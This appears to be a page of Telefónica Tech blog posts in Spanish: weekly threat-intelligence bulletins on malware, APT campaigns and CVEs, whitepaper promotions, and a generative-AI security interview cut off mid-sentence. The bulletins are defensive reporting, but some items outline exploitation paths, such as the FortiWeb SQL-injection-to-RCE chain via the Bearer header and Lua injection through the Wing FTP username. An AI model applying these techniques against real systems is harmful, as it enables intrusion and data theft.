UAC-0099 perfecciona su arsenal y mantiene TTPs de ciberespionaje en campañas contra Ucrania UAC-0099 es un actor de amenazas activo desde 2022, centrado en el ciberespionaje contra organismos gubernamentales, militares y del sector defensa en Ucrania. En 2023 empleó el loader PowerShell LONEPAGE distribuido mediante spear-phishing con adjuntos maliciosos, desplegando herramientas como THUMBCHOP, CLOGFLAG y utilidades TOR/SSH. En 2024 mantuvo el vector de correo, incorporó la explotación de la vulnerabilidad CVE-2023-38831 (CVSSv3 7.8, según CISA) en WinRAR y adoptó un loader LONEPAGE en dos etapas con cifrado 3DES para evadir detección, continuando el abuso de servicios en la nube para C2. En 2025 sustituyó LONEPAGE por un nuevo toolkit en C# (MATCHBOIL, MATCHWOK y DRAGSTARE), con cadenas de infección más complejas basadas en tareas programadas y cargas persistentes. Pese a los cambios técnicos, mantuvo TTPs clave: phishing dirigido, scripts ofuscados, persistencia mediante tareas o claves de registro y robo de datos. Más info Análisis del malware SoupDealer Investigadores de Malwation han analizado SoupDealer, un malware loader de carga sigilosa escrito en Java que se ejecuta en una cadena de tres etapas con un alto grado de ofuscación, persistencia de tareas programadas y recuperación de componentes basada en TOR, incluyendo comprobaciones del entorno para configuraciones regionales de Windows en turco. Se distribuye a través de campañas de phishing en los archivos TEKLIFALINACAKURUNLER.jar y FIYATTEKLIFI.jar, y descarga y ejecuta variantes de Adwind/Eclipse RAT capaces de ejecutar comandos remotos, capturar pantallas, realizar movimientos laterales y evadir antivirus. Aunque no se ha vinculado públicamente a ningún actor malicioso específico, las campañas se han dirigido a bancos, proveedores de servicios de Internet y medianas empresas en Turquía. Las defensas recomendadas incluyen desactivar Java y las macros en los correos electrónicos, implementar filtros de URL/DNS, segmentar las redes, mantener actualizadas las soluciones EDR y mejorar la formación de los usuarios en materia de concienciación. Más info Efimer: troyano multipropósito que combina robo de criptomonedas y expansión web En junio de 2025, se detectó una campaña masiva que distribuía el troyano Efimer, diseñado para robar criptomonedas y expandirse mediante sitios WordPress comprometidos, torrents maliciosos y correos electrónicos de phishing. Los mensajes se hacían pasar por abogados que denunciaban supuestas infracciones de marca, adjuntando archivos que instalaban el malware. Efimer funciona como un ClipBanker, sustituyendo direcciones de monederos en el portapapeles y robando frases semilla, comunicándose con su servidor C2 a través de Tor. Incluye módulos adicionales para fuerza bruta de WordPress, recolección de direcciones de correo y distribución de spam. Algunas variantes amplían el robo a monederos de Tron y Solana, además de Bitcoin, Ethereum y Monero. Entre octubre de 2024 y julio de 2025 afectó a más de 5.000 usuarios, con mayor impacto en Brasil, India y España. Más info Cmimai Stealer: infostealer VBS que exfiltra datos y capturas de pantalla vía Discord K7 Labs ha analizado Cmimai Stealer, un infostealer en Visual Basic Script detectado desde junio de 2025 que emplea PowerShell y scripting nativo de Windows para recopilar información del sistema, metadatos de perfiles de Chrome/Edge y capturas de pantalla. La peculiaridad de la campaña es que los datos se envían a través de webhooks de Discord. El malware crea al menos dos scripts temporales (vbs_ps_browser.ps1 y vbs_ps_diag.ps1) que usa para leer la configuración de perfiles y claves cifradas en navegadores, y para capturar la pantalla y comprimir la imagen antes de subirla respectivamente, ejecutando un ciclo persistente cada hora para actualizar la información. Entre los patrones de comportamiento a monitorizar se encuentra la ejecución de powershell.exe, la creación de archivos temporales con prefijo vbs_ o el tráfico HTTPS hacia Discord con User-Agent “Cmimai Stealer VBS UI Rev”. Más info Plataforma MaaS de CastleBot MaaS utilizada en campañas masivas de ransomware IBM X-Force ha identificado CastleBot, un framework de Malware-as-a-Service activo desde principios de 2025 que distribuye múltiples cargas útiles, desde infostealers hasta backdoors vinculados a ransomware como WarmCookie y NetSupport. Su arquitectura en tres fases emplea stagers y loaders con cifrado ChaCha y técnicas de evasión EDR, incluyendo manipulación de PEB_LDR_DATA y process injection avanzada (QueueUserAPC, NtManageHotPatch). La distribución inicial se realiza mediante instaladores troyanizados, SEO poisoning, repositorios de GitHub falsos y la técnica ClickFix. Las campañas analizadas desplegaron cadenas con múltiples malware (Rhadamanthys, Remcos, DeerStealer, SecTopRAT, HijackLoader, MonsterV2) usando DLL sideloading y archivos ZIP maliciosos. Las recomendaciones incluyen reforzar EDR, bloquear tráfico saliente no HTTPS, aplicar MFA y formar a usuarios para evitar descargas no verificadas. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
15 de agosto de 2025
Guía práctica: hacia una cadena de suministro ciberresiliente
En el último año, el 60% de las empresas reportaron una brecha de seguridad en su cadena de suministro. Estas vulnerabilidades representan una amenaza crítica e inmediata en un ecosistema digital cada vez más interconectado. Cada conexión en una cadena de suministro es un vector de riesgo, capaz de comprometer sistemas enteros con una sola brecha. Un proveedor descuidado, un sistema mal configurado o un error humano pueden desmantelar un ecosistema empresarial. Nuestra guía Protección de la cadena de suministro propone un marco de acción práctico que combina visibilidad, trazabilidad y colaboración. Analiza los impactos de actores externos, terceras y cuartas partes, y sugiere estrategias para fortalecer las defensas digitales. Qué encontrarás en esta guía Amenazas actuales: desde ataques por vulnerabilidades zero-day hasta riesgos de IA y deepfakes. Casos de estudio que revelan la complejidad de los riesgos en cadenas de suministro. El enfoque FPRM para anticipar efectos en cascada de actores indirectos. Herramientas para mapear, evaluar y mitigar riesgos más allá de los proveedores directos. Recomendaciones para adaptarse a normativas internacionales como NIS2, DORA y Cyber Resilience Act. ■ Nuestra guía también presenta soluciones innovadoras, como los servicios de Third-Party Risks de Telefónica Tech, diseñados para mitigar riesgos de manera automatizada y basada en datos. Contenido destacado Estrategias de Ciberseguridad para cadenas de suministro distribuidas y transnacionales. Implementación del enfoque FPRM (Fourth-Party Risk Management) para mitigar riesgos de actores indirectos. Buenas prácticas como auditorías continuas, simulacros sectoriales y cláusulas contractuales adaptadas a normativas internacionales. Innovaciones como la arquitectura Zero Trust y la segmentación de redes. A quién está dirigida esta guía Este contenido está dirigido a profesionales y responsables de Ciberseguridad, así como a ejecutivos que buscan entender el impacto de los riesgos digitales en sus operaciones y adoptar medidas preventivas. Ofrece una visión integral y práctica para anticiparse a las amenazas y asegurar la resiliencia operativa. ■ ¿Quieres construir una cadena de suministro resiliente? Descarga nuestra guía y da el primer paso hacia una protección integral, proactiva y conectada. Descubre cómo una estrategia integral puede influir en la defensa de tus operaciones y en la confianza de tus proveedores, socios y clientes.
12 de agosto de 2025
Boletín Semanal de Ciberseguridad, 4-8 agosto
Vulnerabilidades críticas afectan a más de 100 modelos de portátiles de Dell Talos ha identificado cinco vulnerabilidades críticas en el firmware ControlVault3 de Dell y sus APIs para Windows, denominadas “ReVault”, que afectan a más de 100 modelos de portátiles. Entre ellas se encuentran dos fallos de out-of-bounds (CVE-2025-24311 CVSSv3 8.4, según Talos, CVE-2025-25050 CVSSv3 8.8, según Talos ), un arbitrary free (CVE-2025-25215 CVSSv3 8.8, según Talos), un stack overflow (CVE-2025-24922 CVSSv3 8.8, según Talos) y una unsafe deserialization (CVE-2025-24919 CVSSv3 8.1, según Talos). Estas fallas permiten persistencia post-compromiso incluso tras reinstalar Windows y ataques físicos capaces de evadir el inicio de sesión o aceptar huellas falsas mediante manipulación de la placa USH. Para mitigar los riesgos, se recomienda actualizar el firmware, deshabilitar servicios no utilizados y reforzar la autenticación. Además, la detección puede apoyarse en funciones de intrusión del BIOS, monitoreo de servicios de Windows y soluciones de seguridad avanzadas. Más info Detectado un backdoor en Linux que ha pasado desapercibido durante un año Investigadores de Nextron Systems han descubierto un backdoor para Linux denominado Plague, diseñado como un módulo malicioso PAM (Pluggable Authentication Module) que permite a los atacantes eludir la autenticación del sistema y obtener acceso persistente vía SSH. Debido a que los módulos PAM se integran en procesos de autenticación privilegiados, Plague puede operar de forma encubierta y sin ser detectado por herramientas de seguridad convencionales. La investigación revela que hay muestras activas de este malware desde julio de 2024, sin que ningún motor antivirus lo haya identificado como malicioso. Entre sus capacidades, se encuentran el uso de credenciales estáticas, técnicas anti-debugging, ofuscación de cadenas y la manipulación del entorno para evitar registros forenses. Por ejemplo, elimina variables de entorno como SSH_CONNECTION y redirige el historial de comandos (HISTFILE) a /dev/null. El implante sobrevive a actualizaciones del sistema y presenta un alto nivel de sigilo, lo que dificulta su detección y análisis. Más info Vulnerabilidad crítica en NestJS permite ejecución remota de código en entornos de desarrollo Se identificó una vulnerabilidad crítica (CVE-2025-54782, CVSSv4 10.0, según GitHub) en el paquete @nestjs/devtools-integration de NestJS que permite la ejecución remota de código (RCE) en máquinas de desarrolladores. El fallo surge al habilitar el paquete en modo desarrollo, exponiendo un servidor HTTP local con el endpoint /inspector/graph/interact, que ejecuta código JavaScript en una sandbox insegura basada en vm.runInNewContext. Esta implementación, similar a la abandonada safe-eval, permite escapar fácilmente de la sandbox. Además, la ausencia de validación adecuada de origen y tipo de contenido permite que sitios maliciosos envíen solicitudes POST con text/plain, eludiendo las comprobaciones CORS. Con solo visitar una página maliciosa, un atacante puede ejecutar comandos arbitrarios en el sistema afectado. Investigada por JLLeitschuh (Socket), la vulnerabilidad ha sido corregida reemplazando la sandbox por @nyariv/sandboxjs, añadiendo validación de cabeceras y autenticación. Se recomienda actualizar de inmediato a la versión parcheada. Más info Storm-2603 despliega el ransomware Warlock y LockBit usando marco AK47 C2 El grupo Storm-2603, presuntamente vinculado a China, ha sido relacionado con ataques dirigidos a vulnerabilidades recientes de Microsoft SharePoint Server (CVE-2025-49706 y CVE-2025-49704, CVSSv3 6.5 y 8.8 según proveedor, respectivamente). El actor emplea un marco de comando y control personalizado llamado AK47 C2, que opera mediante canales HTTP (AK47HTTP) y DNS (AK47DNS). Según Check Point, ha estado activo al menos desde marzo de 2025 y ha atacado organizaciones en América Latina y Asia-Pacífico. Entre sus herramientas destacan utilidades legítimas como PsExec, masscan o WinPcap, además de un backdoor personalizado que se comunica con dominios falsos. Utiliza técnicas de DLL sideloading y BYOVD (bring your own vulnerable driver) con un controlador de Antiy Labs para desactivar antivirus. También ha distribuido cargas útiles como Warlock y LockBit Black mediante instaladores MSI maliciosos. Aunque no está claro si sus motivaciones son financieras o de espionaje, Check Point advierte que el grupo combina métodos de APT y cibercrimen en sus operaciones. Más info Grupo vietnamita roba datos de miles de víctimas en 62 países Investigadores de SentinelLABS y Beazley Security han descubierto una operación global liderada por un grupo de habla vietnamita, responsable de comprometer a más de 4000 víctimas en al menos 62 países, entre ellos Corea del Sur, EE. UU., Países Bajos, Hungría y Austria. Los atacantes utilizan un infostealer llamado PaxStealer, que roba contraseñas, cookies, datos de tarjetas de crédito y otra información sensible. El malware ha evolucionado este año para evadir productos antivirus y engañar a analistas de seguridad. Se estima que han robado más de 200.000 contraseñas y 4 millones de cookies, con fines principalmente financieros. Los datos robados se comercializan a través de Telegram mediante un sistema de suscripción automatizado que permite a otros cibercriminales realizar fraudes con criptomonedas o infiltrarse en sistemas ajenos. PaxStealer fue identificado inicialmente en 2023 por Cisco Talos, y aunque no se confirma su vínculo exacto con el grupo CoralRaider, hay coincidencias en el uso del idioma vietnamita en su código. El objetivo de los ataques parece ser amplio y oportunista, afectando tanto a usuarios corporativos como domésticos. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
8 de agosto de 2025
Guía estratégica: cómo prepararse para la era de la criptografía poscuántica
La computación cuántica no es una promesa lejana. Es una realidad tecnológica en desarrollo que ya plantea un riesgo crítico para la seguridad digital. Muchos de los algoritmos criptográficos actuales, que protegen desde transacciones bancarias hasta secretos gubernamentales, podrían quedar obsoletos en menos de una década. Ante esta amenaza, la criptografía poscuántica (PQC) se posiciona como una solución técnica y estratégica que garantiza la protección de la información en un futuro cuántico. Pero la transición no es inmediata ni sencilla: exige planificación, evaluación de riesgos, y visión a largo plazo. Nuestro whitepaper "Preparación estratégica para la criptografía poscuántica" analiza los impactos de esta nueva era y propone un modelo de transición en tres fases: Identificar, Proteger y Gobernar. Una hoja de ruta esencial para empresas, gobiernos y organizaciones que quieren preservar su soberanía digital y operativa. ¿Qué encontrarás en esta guía? El impacto real de la computación cuántica: cómo algoritmos como RSA o ECC quedarán expuestos ante los avances cuánticos. Principales amenazas: estrategias como Harvest Now, Decrypt Later ya están en marcha por actores APT. Casos de uso sectoriales: implicaciones concretas en banca, salud, defensa, industria y automoción. Los algoritmos PQC seleccionados por NIST: CRYSTALS-Kyber, Dilithium, FALCON y SPHINCS+. El marco de transición en 3 pilares: cómo evaluar activos, migrar sistemas y establecer una gobernanza criptoágil. Tres pilares para una transición poscuántica eficaz Identificar: Inventario criptográfico completo, evaluación de riesgos y dependencias críticas. Proteger: Implementación progresiva de algoritmos PQC, pruebas piloto y escenarios híbridos compatibles. Gobernar: Establecimiento de un Centro de Excelencia en Criptografía (CCoE), con visibilidad E2E y capacidades de criptoagilidad. Este enfoque permite migrar de forma escalonada, priorizando los activos más críticos y reduciendo el riesgo operativo sin interrumpir el negocio. ¿Quién debería leer esta guía? Este contenido está dirigido a CISO, responsables de IT y equipos de ciberseguridad, así como a decisores estratégicos que entienden que la seguridad futura depende de las decisiones que se tomen hoy. También es relevante para sectores regulados, como finanzas, sanidad, defensa y automoción, donde la protección de datos de larga duración es crítica. ■ ¿Estás preparado para la amenaza cuántica? Descarga nuestra guía y comienza a trazar una hoja de ruta hacia una infraestructura criptoágil, soberana y preparada para el futuro. Descubre cómo Telefónica Tech puede acompañarte en esta transición, aportando experiencia, tecnología y visión estratégica.
5 de agosto de 2025
Boletín Semanal de Ciberseguridad, 26 julio 1 agosto
SonicWall parchea un nuevo fallo crítico en dispositivos SMA 100 SonicWall ha advertido de una vulnerabilidad crítica de carga de archivos arbitrarios autenticados, la cual podría permitir a los atacantes la ejecución remota de código. El fallo, rastreado como CVE-2025-40599 (CVSSv3 de 9.1 según CISA) está causado por un problema de carga de archivos sin restricciones en las interfaces de gestión web de los dispositivos. Esto puede permitir a los actores de amenazas remotos con privilegios administrativos cargar archivos arbitrarios en el sistema. A pesar de esta condición y de que SonicWall aún no ha encontrado evidencia de explotación activa de la falla, los dispositivos SMA 100 ya estarían siendo objetivo de ataques utilizando credenciales comprometidas, de acuerdo con informes proporcionados por Google Threat Intelligence Group. La vulnerabilidad no afecta a los productos SonicWall SSL VPN de la serie SMA1000 ni a SSL-VPN que se ejecutan en los cortafuegos SonicWall. Por su parte, SonicWall recomienda encarecidamente que los usuarios de los productos de la serie SMA 100 (SMA 210, 410 y 500v) actualicen a la versión corregida. Más info UNC3944 compromete entornos VMware ESXi mediante técnicas avanzadas A mediados de 2025, Google Threat Intelligence detectó una campaña sofisticada del grupo UNC3944 (relacionado con Scattered Spider), dirigida a sectores como el retail, aviación y seguros en EE. UU. El grupo emplea ingeniería social agresiva para vulnerar help desks, obtener credenciales privilegiadas y acceder a entornos VMware vSphere. Mediante tácticas "living-off-the-land", manipulan Active Directory para escalar privilegios y comprometer vCenter, instalando el backdoor Teleport. Luego acceden al hipervisor ESXi, copian discos virtuales de controladores de dominio y exfiltran datos sin ser detectados por soluciones EDR. Posteriormente sabotean sistemas de respaldo y ejecutan ransomware desde el propio hipervisor. La defensa recomendada se basa en tres pilares: endurecimiento preventivo (bloqueo de SSH, MFA, cifrado de VMs), integridad arquitectónica (segmentación de identidades críticas, eliminación de bucles de autenticación) y detección avanzada mediante correlación de logs y alertas de alta fidelidad. Más info APT rusa Laundry Bear apunta a infraestructuras de la OTAN con dominios falsos Los servicios de inteligencia neerlandeses (AIVD y MIVD), junto con Microsoft Threat Intelligence, han identificado a Laundry Bear (también conocido como Void Blizzard) como un grupo APT respaldado por el Estado ruso, activo desde abril de 2024. Este actor ha lanzado campañas de espionaje contra países de la OTAN, Ucrania y diversas entidades europeas y estadounidenses, incluyendo ONG y fuerzas policiales. Laundry Bear emplea credenciales robadas, cookies de sesión y dominios falsos en ataques de phishing sofisticados. Investigaciones más avanzadas revelaron una infraestructura extensa basada en dominios typosquatting, redirecciones maliciosas, y el uso de servicios como Mailgun, Cloudflare y SMTP2GO. Las técnicas empleadas incluyen cadenas CNAME, certificados autofirmados y subdominios temáticos como login y okta. Asimismo, se detectaron múltiples dominios falsificados vinculados a entidades gubernamentales y corporativas que imitaban servicios legítimos para el robo de credenciales. Las autoridades alertan sobre la posible reactivación del grupo y recomiendan una vigilancia activa de estos indicadores. Más info ToxicPanda: troyano bancario ataca móviles Android en Portugal y España El malware bancario ToxicPanda ha comprometido más de 4.500 dispositivos Android, principalmente en Portugal (3.000 casos) y España (1.000), consolidándose como una amenaza relevante en Europa a inicios de 2025. Inicialmente detectado en Asia en 2022, el malware ha evolucionado con capacidades avanzadas para robar credenciales bancarias mediante superposición de pantallas falsas, interceptación de SMS y control total del dispositivo a través de servicios de accesibilidad. El troyano se distribuye mediante APKs maliciosas alojadas en dominios comprometidos o falsos sitios de actualización, haciéndose pasar por Google Chrome. Solicita hasta 58 permisos y usa técnicas antiemulación para evitar análisis en entornos virtuales. Afecta especialmente a móviles económicos de marcas como Samsung, Xiaomi y Oppo. Asimismo, la infraestructura emplea DGA, cifrado DES y AES, y dominios vinculados a Cloudflare, mientras que su persistencia se asegura con la reactivación tras desinstalación y cierre forzado de ventanas del sistema. Su eliminación requiere herramientas como ADB. Se recomienda evitar APKs fuera de tiendas oficiales y revisar permisos concedidos a las apps. Más info GOLD BLADE perfecciona su cadena de infección con RedLoader El grupo cibercriminal GOLD BLADE (también conocido como RedCurl o Red Wolf) ha desplegado una nueva cadena de infección en sus campañas recientes, dirigidas a personal de recursos humanos mediante correos de phishing con documentos falsos de candidatos. Esta técnica, observada en julio de 2025, combina LNK maliciosos y binarios legítimos de Adobe para cargar remotamente su malware RedLoader. El ataque inicia con un PDF que enlaza a un archivo ZIP con un LNK que ejecuta conhost.exe, conectándose a un dominio controlado por los atacantes vía WebDAV. Desde ahí, se descarga un ejecutable firmado por Adobe que carga una DLL maliciosa (RedLoader etapa 1) sin escribir archivos maliciosos en disco. Posteriormente, una tarea programada descarga la etapa 2 de RedLoader, que establece comunicaciones con el C2, realiza reconocimiento en Active Directory y facilita la exfiltración de datos. Sophos recomienda activar políticas de restricción para bloquear LNK y ofrece firmas específicas para detectar estas variantes. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
1 de agosto de 2025
Boletín Semanal de Ciberseguridad, 19-25 julio
Microsoft parchea dos nuevas 0-day explotadas en ataques ToolShell contra SharePoint Microsoft ha lanzado actualizaciones de emergencia para corregir dos vulnerabilidades 0-day (CVE-2025-53770, CVSSv3 9.8 según proveedor, y CVE-2025-53771, CVSSv3 6.3 según Microsoft) en SharePoint Server. Estas fallas fueron explotadas en ataques activos bajo el nombre ToolShell, descubiertos inicialmente durante el concurso Pwn2Own Berlín 2024, y afectan a SharePoint 2019 y Subscription Edition. Los atacantes lograron sortear parches previos y comprometer más de 50 organizaciones a nivel mundial. Microsoft recomienda instalar de inmediato las actualizaciones KB5002754 (SharePoint 2019) y KB5002768 (Subscription Edition), y realizar una rotación de claves de máquina mediante PowerShell o Central Admin. También se aconseja revisar el sistema y los logs IIS para detectar actividad sospechosa, como la creación del archivo malicioso spinstall0.aspx o peticiones POST al archivo ToolPane.aspx. En caso de encontrar evidencias, se recomienda iniciar una investigación forense completa del servidor y la red. Más info APT35 lanza campañas de phishing con IA contra investigadores occidentales Analistas de CyberProof han detectado una nueva campaña del grupo iraní APT35 (también conocido como Charming Kitten) que emplea inteligencia artificial para lanzar sofisticados ataques de phishing dirigidos a investigadores en ciberseguridad y académicos en países occidentales. A diferencia de campañas anteriores centradas en el espionaje, estas operaciones buscan comprometer directamente a quienes investigan y defienden contra las ciberamenazas. Aprovechando modelos de lenguaje avanzados, los atacantes generan correos electrónicos que imitan con precisión a figuras del sector, incluyendo referencias a investigaciones, conferencias y amenazas emergentes. El objetivo es construir relaciones a largo plazo con las víctimas para extraer información sensible o acceder a redes de investigación. Esta evolución en las tácticas de APT35 representa un cambio estratégico dentro del conflicto geopolítico, enmarcado en las crecientes tensiones tras los bombardeos israelíes y estadounidenses sobre Irán en junio de 2025. Más info CISA incorpora a su catálogo KEV dos vulnerabilidades de SharePoint CISA ha alertado de dos fallos de Microsoft SharePoint, CVE-2025-49704 y CVE-2025-49706 (CVSSv3 de 8.8 y 6.5 según fabricante, respectivamente) que han sido añadidos a su catálogo de vulnerabilidades explotadas conocidas (KEV), en base a pruebas de explotación activa. Por ende, las agencias del Poder Ejecutivo Civil Federal (FCEB) deben corregir las vulnerabilidades antes del 23 de julio de 2025. La inclusión de ambas fallas, una de suplantación de identidad y otra de ejecución remota de código (RCE), rastreadas colectivamente como ToolShell, en el catálogo KEV tuvo lugar después de que Microsoft revelara que grupos chinos como Linen Typhoon y Violet Typhoon aprovecharon los fallos para dirigirse a servidores SharePoint locales desde el 7 de julio de 2025. Microsoft, además, alude a los fallos CVE-2025-53770 y CVE-2025-53771 (CVSSv3 de 9.8 y 6.5 según fabricante, respectivamente), considerados omisiones de parche para CVE-2025-49704 y CVE-2025-49706, respectivamente. En adición, watchTowr Labs informó de haber ideado internamente un método para explotar CVE-2025-53770 eludiendo la interfaz de análisis antimalware (AMSI), una medida de mitigación descrita por Microsoft. Más info Nueva variante del malware Konfety evade análisis y simula apps legítimas Investigadores de Zimperium han detectado una nueva variante del malware Konfety para Android, que emplea avanzadas técnicas de evasión como estructuras ZIP malformadas, DEX cifrados y compresión BZIP no soportada por herramientas de análisis. Este malware se disfraza de apps legítimas mediante una táctica conocida como evil twin, distribuyéndose en tiendas de aplicaciones de terceros. Aunque no es un spyware ni un RAT, incluye una DEX secundaria que se descifra y ejecuta en tiempo de ejecución, permitiendo cargar módulos adicionales de forma dinámica. Entre sus capacidades destacan la exfiltración de información del dispositivo, redirección a sitios maliciosos, instalación forzada de apps y uso del SDK CaramelAds para mostrar anuncios ocultos. También utiliza geofencing y oculta su icono tras la instalación. Este enfoque recuerda a otros casos como SoumniBot, donde se manipulan compresiones y metadatos para dificultar el análisis. Se recomienda evitar APKs de fuentes no oficiales. Más info UNG0002: Campañas de ciberespionaje avanzadas en Asia El grupo de amenazas UNG0002 ha sido identificado por Seqrite Labs como responsable de campañas de espionaje dirigidas contra organizaciones en China, Hong Kong y Pakistán desde mayo de 2024. Bajo las operaciones Cobalt Whisper y AmberMist, el grupo ha evolucionado desde el uso de herramientas conocidas como Cobalt Strike y Metasploit, hasta el desarrollo de implantes personalizados como Shadow RAT e INET RAT. En la campaña más reciente, sus objetivos se han ampliado a empresas de videojuegos, desarrollo de software e instituciones académicas. UNG0002 emplea técnicas de ingeniería social avanzadas, incluyendo el método ClickFix, que usa CAPTCHAs falsos para ejecutar scripts maliciosos. También destaca su uso de archivos LNK y técnicas de DLL sideloading con aplicaciones legítimas para evadir la detección. La infraestructura, nombres de usuario y tácticas empleadas apuntan a un actor con respaldo organizacional, posiblemente alineado con intereses estatales del sudeste asiático. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
25 de julio de 2025
Boletín Semanal de Ciberseguridad, 12-18 julio
Vulnerabilidad de ejecución remota de código del servidor FTP de Wing explotada en la red Investigadores de Huntress revelaron que la vulnerabilidad crítica CVE-2025-47812 (CVSSv3 10.0 según MITRE) en Wing FTP Server, que permite ejecución remota de código (RCE), ha sido explotada activamente desde el 1 de julio de 2025. Divulgada públicamente el 30 de junio junto a un exploit funcional, permite a actores maliciosos inyectar código Lua arbitrario mediante un truco en el nombre de usuario, incluso usando cuentas anónimas (si están habilitadas). Al visitar ciertas páginas, el código se ejecuta, facilitando descarga de malware, reconocimiento y despliegue de herramientas de acceso remoto. Arctic Wolf alertó que estas técnicas podrían usarse para robo de datos o ransomware. Se recomienda actualizar a la versión 7.4.4 o superior. Más info Análisis del malware AsyncRAT AsyncRAT, un troyano de acceso remoto de código abierto publicado en GitHub en 2019, se ha convertido en una herramienta ampliamente utilizada por actores maliciosos gracias a su modularidad y facilidad de modificación. Aunque no es una bifurcación directa de Quasar RAT, comparte ciertos elementos criptográficos con este, y ha servido como base para múltiples variantes. Entre los forks más activos se encuentran DcRat y VenomRAT, que incorporan funcionalidades ampliadas como evasión de AMSI, cifrado AES-256, y módulos de ransomware. Algunas variantes menos comunes añaden plugins para robar criptomonedas, propagar malware vía USB, o recolectar datos geográficos. La diversidad de versiones demuestra cómo el carácter abierto de AsyncRAT ha permitido su proliferación. Cada fork refleja distintas prioridades ofensivas, desde el cibercrimen financiero hasta funciones de vigilancia. Según ESET, aunque no todas las variantes están documentadas, muchas se han observado activamente en campañas reales. Más info Vulnerabilidad 0-day de Google Chrome explotada activamente Google ha lanzado una actualización de emergencia para Chrome versión 138 tras descubrir una vulnerabilidad crítica de día cero (CVE-2025-6558, CVSSv3 8.8 según CISA) que ya está siendo explotada activamente. El fallo, identificado por el Threat Analysis Group de Google, afecta a los componentes ANGLE y GPU del navegador y permite la ejecución de código malicioso mediante validación incorrecta de entradas no confiables. Además de esta vulnerabilidad, la actualización corrige otros fallos graves: un desbordamiento de enteros en V8 (CVE-2025-7656, CVSSv3 8.8 según CISA) y un use-after-free en WebRTC (CVE-2025-7657, CVSSv3 8.8 según CISA). La actualización ya está disponible para Windows, Mac, Linux y próximamente para Android. Google recomienda actualizar de inmediato para evitar ataques, y ha restringido temporalmente los detalles técnicos para proteger a los usuarios mientras se implementan los parches. Más info UNC6148 se dirige a dispositivos SonicWall SMA parcheados para desplegar malware Investigadores del grupo GTIG de Google detectaron actividad maliciosa dirigida a dispositivos SonicWall SMA Serie 100, totalmente parcheados, como parte de una campaña diseñada para lanzar la backdoor OVERSTEP. La actividad, registrada desde octubre de 2024, ha sido atribuida al grupo UNC6148. Este aprovecharía credenciales y semillas de contraseñas OTP robadas, recuperando el acceso incluso después de que se hayan aplicado actualizaciones de seguridad. El vector de acceso inicial exacto utilizado se desconoce, si bien se cree que podría haberse obtenido mediante la explotación de vulnerabilidades conocidas. Tras conseguir acceso, los atacantes establecen una sesión SSL-VPN y generan una shell inversa, posiblemente mediante explotación de 0-day. Esta se usa para ejecutar comandos de reconocimiento y manipulación de archivos, entre otros actos. Finalmente, se despliega un implante previamente indocumentado (OVERSTEP) capaz de modificar el proceso de arranque del appliance para mantener acceso persistente, así como de robar credenciales y ocultar sus componentes para evadir la detección. Una vez completado el despliegue, el grupo procede a borrar los registros del sistema y reinicia el cortafuegos para activar la ejecución de la backdoor. Más info Publicado un exploit para una vulnerabilidad crítica en FortiWeb que permite RCE sin autenticación Fortinet ha corregido una vulnerabilidad crítica, CVE-2025-25257 (CVSSv3 9.6 según proveedor), que afecta a múltiples versiones de FortiWeb (7.0.0 a 7.6.3). La vulnerabilidad reside en el componente Fabric Connector y permite a atacantes no autenticados ejecutar comandos SQL arbitrarios y escalar a ejecución remota de código (RCE). La causa principal es una inadecuada validación del encabezado Authorization: Bearer, lo que permite inyecciones SQL incluso con restricciones de caracteres mediante sintaxis de comentarios de MySQL (/**/). Investigadores de WatchTowr demostraron que es posible escribir archivos arbitrarios con INTO OUTFILE y ejecutar código malicioso mediante archivos .pth en directorios de Python, aprovechando scripts CGI existentes con permisos elevados. En entornos mal configurados, la explotación permite incluso ejecución como root, existiendo pruebas de concepto públicas aunque no se han detectado todavía campañas activas. Fortinet ha publicado actualizaciones en las versiones 7.6.4, 7.4.8, 7.2.11 y 7.0.11 por lo que se recomienda aplicar los parches de inmediato o deshabilitar temporalmente la interfaz de administración HTTP/HTTPS si no es posible. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
18 de julio de 2025
«La Ciberseguridad es clave para aprovechar el verdadero valor de la IA Generativa»
La adopción de inteligencia artificial generativa en entornos empresariales plantea desafíos importantes en términos de responsabilidad, seguridad y gobernanza. La ciberseguridad es un pilar esencial para proteger datos sensibles, asegurar modelos y cumplir con normativas vigentes, garantizando la confianza y la integridad de las soluciones de IA. Sobre todo ello hablamos con David Prieto, Head of Identity and AI Security, y Elena Zapatero, Business Development Manager. ______ ¿Cuáles son los principales retos que enfrentan las empresas al adoptar soluciones de IA? El primer reto sin duda es identificar quién asume la responsabilidad de las iniciativas de inteligencia artificial dentro de la organización, así como de garantizar su desarrollo bajo los estándares de seguridad definidos. Este primer paso, por sí solo, requiere la implicación coordinada de múltiples áreas. Una vez definida esta responsabilidad, la organización debe enfrentarse a retos adicionales tanto en el ámbito técnico, como en el de la gobernanza. Entre los más relevantes se encuentran la falta de visibilidad sobre las aplicaciones de IA en uso, la dificultad para proteger los datos sensibles durante el entrenamiento de modelos o el RAG, la exposición a vulnerabilidades y la escasa preparación frente a nuevas amenazas como el prompt injection o el jailbreaking de modelos. Además, la adopción de IA requiere rediseñar arquitecturas de seguridad, garantizar el cumplimiento normativo (GDPR, PCI-DSS, NIST AI) y coordinar múltiples actores tecnológicos y humanos de la organización. ¿Cuál es la importancia de la seguridad en la implementación de IA generativa en un entorno corporativo? La seguridad es esencial en la IA generativa porque esta tecnología no solo puede amplificar amenazas ya conocidas, sino también introducir nuevas formas de ataque, manipulación y fuga de información que impactan directamente en la confianza, la integridad y el negocio de las organizaciones. Las organizaciones suelen adoptar estas tecnologías de dos formas principales: consumiendo aplicaciones de IA a través de servicios web o SaaS, o construyendo y desplegando sus propias soluciones sobre infraestructuras cloud o incluso on-premise. Cada uno de estos enfoques conlleva amenazas específicas que deben abordarse mediante estrategias de protección diferenciadas, muy alineadas con los principios del modelo de responsabilidad 